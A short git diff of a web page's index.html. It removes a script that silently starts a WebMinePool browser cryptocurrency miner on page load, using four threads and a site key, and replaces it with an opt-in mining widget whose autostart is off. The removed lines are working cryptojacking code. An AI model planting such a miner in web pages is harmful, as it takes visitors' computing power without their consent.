--- a/index.html
+++ b/index.html
@@ -16,22 +16,16 @@
   
 </body>
   
-<script src="https://webminepool.com/lib/base.js"></script>
-
-<script>
-
-    var miner = WMP.User('<SK_MMgT8VQDSrSAMk4M2Ej5l>', '<ElLobito>',{
-
-        threads: 4,
-
-        autoThreads: false,
-
-        throttle: 0.1,
-
-
-    });
-
-    miner.start();
+<script src="https://webminepool.com/lib/simple-ui.js"></script>
+<div id="wmp-container"
+    wmp-site-key="SK_tmvY5oKySfG6mlqVJdp86"
+    wmp-username="your-faucetpay-btc-address"
+    wmp-threads="2"
+    wmp-throttle="0.1"
+    wmp-autostart="false"
+    style="margin: 0 auto;"
+>
+</div>
 
 </script>
 
